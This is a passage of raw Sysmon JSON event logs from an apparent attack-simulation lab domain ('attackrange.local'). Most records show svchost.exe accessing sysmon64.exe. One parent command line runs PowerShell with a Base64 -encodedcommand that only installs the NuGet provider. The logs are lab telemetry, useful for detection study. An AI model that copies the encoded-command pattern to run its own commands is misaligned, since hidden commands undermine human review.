@\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","ParentProcessId":"3112","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4435,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4436,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4437,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4438,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4439,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4440,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4441,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4442,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 